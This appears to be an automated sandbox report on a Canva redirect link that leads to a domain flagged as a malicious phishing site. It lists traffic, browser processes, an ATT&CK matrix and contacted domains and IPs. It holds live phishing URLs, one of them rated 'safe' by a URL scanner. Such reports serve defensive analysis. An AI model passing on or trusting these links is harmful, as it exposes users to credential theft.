Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 50220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50216
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50215
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50210
Source: unknown	Network traffic detected: HTTP traffic on port 50248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50211
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50220
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50222
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50248
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49805 version: TLS 1.2

Source: classification engine

Classification label: mal52.phis.win@26/213@198/590

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1904,i,9976407154716733636,9960061309519468343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1904,i,9976407154716733636,9960061309519468343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Source	Detection	Scanner	Label	Link
https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document	0%	Avira URL Cloud	safe

Name	IP	Active	Malicious	Reputation
s.tribalfusion.com	104.18.37.193	true	false	high
static.cloudflareinsights.com	104.16.79.73	true	false	high
global.px.quantserve.com	91.228.74.244	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
www.canva.com	104.16.103.112	true	false	high
eu-eb2.3lift.com	13.248.245.213	true	false	high
bttrack.com	192.132.33.68	true	false	high
adobetarget.data.adobedc.net	66.235.152.156	true	false	high
idsync.rlcdn.com	35.244.154.8	true	false	high
5igcqa810yp2rcmgvohmmeoewkmyvjbw4uvf8uaagn99durqrlobvm.birsbunh.ru	104.21.32.1	true	false	unknown
code.jquery.com	151.101.2.137	true	false	high
dualstack.tls13.taboola.map.fastly.net	151.101.1.44	true	false	high
static.canva.com	104.16.102.112	true	false	high
sync.crwdcntrl.net	18.141.252.181	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
publisher.liveperson.net	34.120.154.120	true	false	high
cm.g.doubleclick.net	142.250.181.2	true	false	high
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	high
rtb.adentifi.com	23.20.243.197	true	false	high
www.google.com	142.250.181.132	true	false	high
dcs-ups.g03.yahoodns.net	188.125.88.204	true	false	high
dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com	54.155.160.118	true	false	high
sync.srv.stackadapt.com	54.165.187.207	true	false	high
msftenterprise.sc.omtrdc.net	63.140.62.27	true	false	high
match.adsrvr.org	52.223.40.198	true	false	high
star-mini.c10r.facebook.com	157.240.195.35	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
us-u.openx.net	35.244.159.8	true	false	high
o13855.ingest.sentry.io	34.120.195.249	true	false	high
s.twitter.com	104.244.42.195	true	false	high
gu3.watetiona.com	104.21.59.210	true	true	unknown
aragorn-prod-or-acai-lb.inbake.com	35.83.238.191	true	false	unknown
dsum-sec.casalemedia.com	104.18.26.193	true	false	high
a.tribalfusion.com	104.18.37.193	true	false	high
challenges.cloudflare.com	104.18.94.41	true	false	high
dh1y47vf5ttia.cloudfront.net	18.66.161.117	true	false	unknown
ib.anycast.adnxs.com	185.89.210.46	true	false	high
pug-sg4c.pubmnet.com	67.199.150.86	true	false	high
js.monitor.azure.com	unknown	unknown	false	high
ag.innovid.com	unknown	unknown	false	high
idpix.media6degrees.com	unknown	unknown	false	high
va.v.liveperson.net	unknown	unknown	false	high
px.owneriq.net	unknown	unknown	false	high
static-assets.fs.liveperson.com	unknown	unknown	false	high
cm.everesttech.net	unknown	unknown	false	high
jadserve.postrelease.com	unknown	unknown	false	high
z.clarity.ms	unknown	unknown	false	high
dmpsync.3lift.com	unknown	unknown	false	high
accdn.lpsnmedia.net	unknown	unknown	false	high
assets.adobedtm.com	unknown	unknown	false	high
rtd.tubemogul.com	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	high
pixel.rubiconproject.com	unknown	unknown	false	high
trc.taboola.com	unknown	unknown	false	high
munchkin.marketo.net	unknown	unknown	false	high
cms.analytics.yahoo.com	unknown	unknown	false	high
sync-tm.everesttech.net	unknown	unknown	false	high
lpcdn.lpsnmedia.net	unknown	unknown	false	high
ds.reson8.com	unknown	unknown	false	high
ups.analytics.yahoo.com	unknown	unknown	false	high
image2.pubmatic.com	unknown	unknown	false	high
cdn.botframework.com	unknown	unknown	false	high
dpm.demdex.net	unknown	unknown	false	high
rtd-tm.everesttech.net	unknown	unknown	false	high
servedby.flashtalking.com	unknown	unknown	false	high
www.facebook.com	unknown	unknown	false	high
www.clarity.ms	unknown	unknown	false	high
mscom.demdex.net	unknown	unknown	false	high
play.vidyard.com	unknown	unknown	false	high
analytics.twitter.com	unknown	unknown	false	high
cms.quantserve.com	unknown	unknown	false	high
ib.adnxs.com	unknown	unknown	false	high
sync.search.spotxchange.com	unknown	unknown	false	high
login.microsoftonline.com	unknown	unknown	false	high
lptag.liveperson.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://gu3.watetiona.com/YEcft/	true		unknown
https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
18.141.252.181	sync.crwdcntrl.net	United States	16509	AMAZON-02US	false
91.228.74.244	global.px.quantserve.com	United Kingdom	27281	QUANTCASTUS	false
20.189.173.6	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
35.83.238.191	aragorn-prod-or-acai-lb.inbake.com	United States	237	MERIT-AS-14US	false
104.18.37.193	s.tribalfusion.com	United States	13335	CLOUDFLARENETUS	false
35.244.154.8	idsync.rlcdn.com	United States	15169	GOOGLEUS	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
52.167.30.171	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.101.130.137	unknown	United States	54113	FASTLYUS	false
104.16.102.112	static.canva.com	United States	13335	CLOUDFLARENETUS	false
104.121.8.149	unknown	United States	16625	AKAMAI-ASUS	false
64.233.164.84	unknown	United States	15169	GOOGLEUS	false
34.120.154.120	publisher.liveperson.net	United States	15169	GOOGLEUS	false
23.218.208.236	unknown	United States	6453	AS6453US	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
151.101.66.49	unknown	United States	54113	FASTLYUS	false
151.101.193.44	unknown	United States	54113	FASTLYUS	false
18.66.161.113	unknown	United States	3	MIT-GATEWAYSUS	false
23.20.243.197	rtb.adentifi.com	United States	14618	AMAZON-AESUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
172.217.17.78	unknown	United States	15169	GOOGLEUS	false
13.107.21.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.248.245.213	eu-eb2.3lift.com	United States	16509	AMAZON-02US	false
172.217.17.34	unknown	United States	15169	GOOGLEUS	false
104.21.32.1	5igcqa810yp2rcmgvohmmeoewkmyvjbw4uvf8uaagn99durqrlobvm.birsbunh.ru	United States	13335	CLOUDFLARENETUS	false
18.66.161.117	dh1y47vf5ttia.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
172.217.17.35	unknown	United States	15169	GOOGLEUS	false
54.155.160.118	dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
104.18.95.41	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.1.44	dualstack.tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.126.37.161	unknown	United States	20940	AKAMAI-ASN1EU	false
66.235.152.156	adobetarget.data.adobedc.net	United States	15224	OMNITUREUS	false
152.199.21.175	sni1gl.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
54.165.187.207	sync.srv.stackadapt.com	United States	14618	AMAZON-AESUS	false
52.223.40.198	match.adsrvr.org	United States	8987	AMAZONEXPANSIONGB	false
67.199.150.86	pug-sg4c.pubmnet.com	United States	3257	GTT-BACKBONEGTTDE	false
172.217.19.206	unknown	United States	15169	GOOGLEUS	false
13.107.246.63	s-part-0035.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.233.12.48	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
152.199.19.160	unknown	United States	15133	EDGECASTUS	false
20.190.147.12	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.18.94.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
151.101.2.49	unknown	United States	54113	FASTLYUS	false
69.173.144.139	unknown	United States	26667	RUBICONPROJECTUS	false
34.255.155.228	unknown	United States	16509	AMAZON-02US	false
40.126.53.11	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.18.41.39	unknown	United States	13335	CLOUDFLARENETUS	false
69.173.144.138	unknown	United States	26667	RUBICONPROJECTUS	false
208.89.12.87	unknown	United States	11054	LIVEPERSONUS	false
63.140.62.27	msftenterprise.sc.omtrdc.net	United States	15224	OMNITUREUS	false
178.249.97.99	unknown	United Kingdom	11054	LIVEPERSONUS	false
35.244.159.8	us-u.openx.net	United States	15169	GOOGLEUS	false
37.252.172.123	unknown	European Union	29990	ASN-APPNEXUS	false
104.21.59.210	gu3.watetiona.com	United States	13335	CLOUDFLARENETUS	true
188.125.88.206	unknown	United Kingdom	10310	YAHOO-1US	false
54.155.137.139	unknown	United States	16509	AMAZON-02US	false
34.249.14.47	unknown	United States	16509	AMAZON-02US	false
13.89.178.27	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.16.79.73	static.cloudflareinsights.com	United States	13335	CLOUDFLARENETUS	false
157.240.195.35	star-mini.c10r.facebook.com	United States	32934	FACEBOOKUS	false
185.89.210.46	ib.anycast.adnxs.com	Germany	29990	ASN-APPNEXUS	false
192.132.33.68	bttrack.com	United States	18568	BIDTELLECTUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.18.27.193	unknown	United States	13335	CLOUDFLARENETUS	false
184.85.177.135	unknown	United States	20940	AKAMAI-ASN1EU	false
54.191.117.1	unknown	United States	16509	AMAZON-02US	false
184.30.21.171	unknown	United States	16625	AKAMAI-ASUS	false
104.18.8.76	unknown	United States	13335	CLOUDFLARENETUS	false
188.125.88.204	dcs-ups.g03.yahoodns.net	United Kingdom	10310	YAHOO-1US	false
104.18.26.193	dsum-sec.casalemedia.com	United States	13335	CLOUDFLARENETUS	false
104.16.103.112	www.canva.com	United States	13335	CLOUDFLARENETUS	false
178.249.97.23	unknown	United Kingdom	11054	LIVEPERSONUS	false
104.244.42.3	unknown	United States	13414	TWITTERUS	false
184.30.20.187	unknown	United States	16625	AKAMAI-ASUS	false
104.244.42.195	s.twitter.com	United States	13414	TWITTERUS	false
20.10.16.51	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.101.1.181	unknown	United States	54113	FASTLYUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
34.217.153.224	unknown	United States	16509	AMAZON-02US	false
142.250.181.104	unknown	United States	15169	GOOGLEUS	false
151.101.129.181	unknown	United States	54113	FASTLYUS	false
142.250.181.2	cm.g.doubleclick.net	United States	15169	GOOGLEUS	false
142.250.181.99	unknown	United States	15169	GOOGLEUS	false
34.120.195.249	o13855.ingest.sentry.io	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574985
Start date and time:	2024-12-13 23:14:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.win@26/213@198/590

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.17.78, 64.233.164.84, 172.217.17.46, 199.232.210.172
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document

Input	Output
